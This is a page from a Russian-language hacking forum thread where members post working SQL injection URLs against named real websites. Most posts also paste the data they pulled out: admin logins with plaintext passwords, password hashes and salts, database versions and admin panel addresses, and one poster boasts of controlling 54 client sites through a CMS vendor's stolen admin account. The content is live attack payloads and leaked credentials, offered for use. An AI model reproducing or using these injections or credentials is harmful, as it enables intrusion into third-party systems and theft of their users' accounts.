HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 641 из 1604 « Первая < 141541591631 637 638 639 640 641 642 643 644 645 6516917411141 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #6401  
Старый 21.08.2008, 16:05
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами: 9384053

Репутация: 303
По умолчанию
Иногда из-за идиотизма одного страдают многие.......
Не успел запостить http://www.bridesathotbobbins.co.uk/

Как, совершенно ненароком, мой взор пал на маааханькую приписочку снизу... А именнно
Powered by Qwicsite Pro

Да,да дружок! Именно там где мы логинимся вместо нерадивого админа. Зайдя на сайт этой чудной смски, я с удивлением обнаружил что баг то не местного разлива, а именно роднной баг СМС и исправлть его никто нигде не брался!!!

http://www.qwic.co.uk/?pageid=-1+union+select+1,2,3,concat(0x3a3a,username,0x3a3a ,password)+from+accounts/*

Login:admin Pass:stolave22

Там есть подраздельчик Qwicsite Pro websites admin, заходим туда и админим сразу всех их клиентов!!! А их не много не мало - 54 штуки!!!!
 
Ответить с цитированием

  #6402  
Старый 21.08.2008, 16:46
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
С нами: 9550090

Репутация: 137
По умолчанию
http://www.farmnet.eu/wcr/index.php?page=news/detail&newsID=11+and+1=2+union+select+concat_ws(0x 3a,user(),version(),database()),2,3,4,5,6,7,8,9,10 ,11,12,13,14,15/*

user() = eu-info@localhost
version() = 5.0.27
database() = db02

http://www.farmnet.eu/wcr/index.php?page=log-in

wcr-team:maize
 
Ответить с цитированием

  #6403  
Старый 21.08.2008, 19:28
softrix
Новичок
Регистрация: 05.07.2008
Сообщений: 16
С нами: 9395645

Репутация: 7
По умолчанию
http://www.hotels-piter.spb.ru/pages_piter.php?idleft=-4+union+select+concat(login,7,password)+from+users

Только ХЗ от чего пароль, к админке не подходит !
Ну может кому интерестно пороет найдет, если найдете отпишитесь, любопытно !
 
Ответить с цитированием

  #6404  
Старый 21.08.2008, 22:15
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами: 9384053

Репутация: 303
По умолчанию
http://msracing.co.uk/category.php?c_id=1)+union+select+1,2,concat(0x3a3 a,u_username,0x3a3a,u_password),4+from+users/*

http://msracing.co.uk/admin/

login:msrcng06 pass:msrcng2006
 
Ответить с цитированием

  #6405  
Старый 21.08.2008, 23:57
SVAROG
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
С нами: 10126406

Репутация: 206
По умолчанию
http://www.breitbart.com/print.php?id=D8QRMCU00%27+union+select+1,2,3,4,5,6 ,7,8,9,0,version(),2/*
4.1.20-log
 
Ответить с цитированием

  #6406  
Старый 22.08.2008, 00:38
Elephant
Новичок
Регистрация: 31.07.2008
Сообщений: 11
С нами: 9356820

Репутация: -3
По умолчанию
Заметьте, проект САМЫЙ крупный который посвящён серии GTA

http://gta.com.ua/file_sa_details.phtml?id=59'
 
Ответить с цитированием

  #6407  
Старый 22.08.2008, 00:57
4p3
Участник форума
Регистрация: 18.08.2008
Сообщений: 159
С нами: 9332069

Репутация: 92
По умолчанию
Цитата:
Сообщение от Elephant  
Заметьте, проект САМЫЙ крупный который посвящён серии GTA

http://gta.com.ua/file_sa_details.phtml?id=59'
Раскрутил бы до конца что ли...

http://gta.com.ua/file_sa_details.phtml?id=999+union+select+1,2,3,co ncat_ws(0x3a3a,username,password),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20+from+admin/*

Версия: 4.
Login:admin
Password hash:2IsfJILPkOJ2 (DES??)

http://gta.com.ua/admin -> Access Denied, потому никакого смысла нема. Разве что на форуме стоит ipb 2. Можно из for_members_converge вытянуть соль и хэшик.
 
Ответить с цитированием

  #6408  
Старый 22.08.2008, 15:32
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
С нами: 9550090

Репутация: 137
По умолчанию
http://www.fbmbmx.com/news.php?newsid=1296+and+1=2+union+select+1,concat _ws(0x3a,user(),version(),database()),3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

user() = fbmbmx@localhost
version() = 4.1.21-log
database() = fbmbmx

admins
name:password

mike:erb9768
john:lee7124
steve:crandall4776
tom:blyth24
mikefixed:erb9768
Последний раз редактировалось nicusor; 22.08.2008 в 15:48..
 
Ответить с цитированием

  #6409  
Старый 22.08.2008, 23:46
DTW
Участник форума
Регистрация: 11.05.2008
Сообщений: 202
С нами: 9473484

Репутация: 104
По умолчанию
Цитата:
http://www.planeta-lv.com/index_flash.php?page=1&sub=1'+union+select+1,2,3,4 ,5,6,7,8,TABLE_NAME,0,1,2,3+FROM+INFORMATION_SCHEM A.TABLES/*

планета
 
Ответить с цитированием

  #6410  
Старый 23.08.2008, 01:02
softrix
Новичок
Регистрация: 05.07.2008
Сообщений: 16
С нами: 9395645

Репутация: 7
По умолчанию
Вот инъект на порносайте, интересно конечно в админку было бы влезть, но соленый хэш
И не известно как соленый, да еще соль похоже хэшированая, а где чистая соль лежит не нашел еще !

http://novoporn.com/index.php?action=image&id=-16323+union+select+1,concat(id,char(58,58,58),logi nname,char(58,58,58),password,char(58,58,58),salt, char(58,58,58),title,char(58,58,58),firstname,char (58,58,58),lastname,char(58,58,58),email,char(58,5 8,58),inactive),3+from+cfw_auth_login

name::ass:::salt
admin:::32d22edc834dbe06bef10ffb7cb148e1:::b7f4cf8 29896e1ccbfbc63c934077c6c
 
Ответить с цитированием
Ответ
Страница 641 из 1604 « Первая < 141541591631 637 638 639 640 641 642 643 644 645 6516917411141 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.